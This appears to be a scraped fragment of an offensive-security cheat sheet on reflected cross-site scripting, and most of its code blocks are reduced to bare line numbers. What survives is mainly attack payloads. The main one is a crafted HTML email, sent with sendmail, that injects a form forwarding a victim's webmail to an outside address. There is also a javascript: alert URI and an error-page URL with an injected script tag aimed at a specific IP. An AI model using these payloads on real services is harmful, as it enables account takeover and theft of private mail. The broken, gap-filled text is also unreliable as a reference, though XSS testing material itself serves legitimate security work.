Reflected Cross Site Scripting
Check List
Methodology
Black Box
1
2
3
4
5
6
7
1
2
From: jouko@klikki.fi
To: jouko@hey.com
Subject: HackerOne test
MIME-Version: 1.0
Content-type: text/html
<style>
url(cid://\00003c\000027message-content\00003e\00003ctemplate\00003e\00003cstyle\00003exxx);
url(cid://\00003c/style\00003e\00003c/template\00003e\00003c/message-content\00003e\00003cform\000020action=/my/accounts/266986/forwardings/outbounds\000020data-controller=beacon\00003e\00003cinput\000020type=text\000020name=contact_outbound_forwarding[to_email_address]\000020value=joukop@gmail.com\00003e\00003c/form\00003exxx);
</style>3
/usr/sbin/sendmail -t < email.txt4
5
6
7
1
2
3
4
javascript:alert('XSS')5
1
2
3
4
errmsg = [https://102.176.160.119:10443/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E]1
2
3
1
2
3
4
1
2
3
4
1
2
3
1
2
3
4
Reflected In ContactForm
1
2
3
4
User-Agent Header
1
2
3
4
5
Language Parameter
1
2
3
White Box
Cheat Sheet
Last updated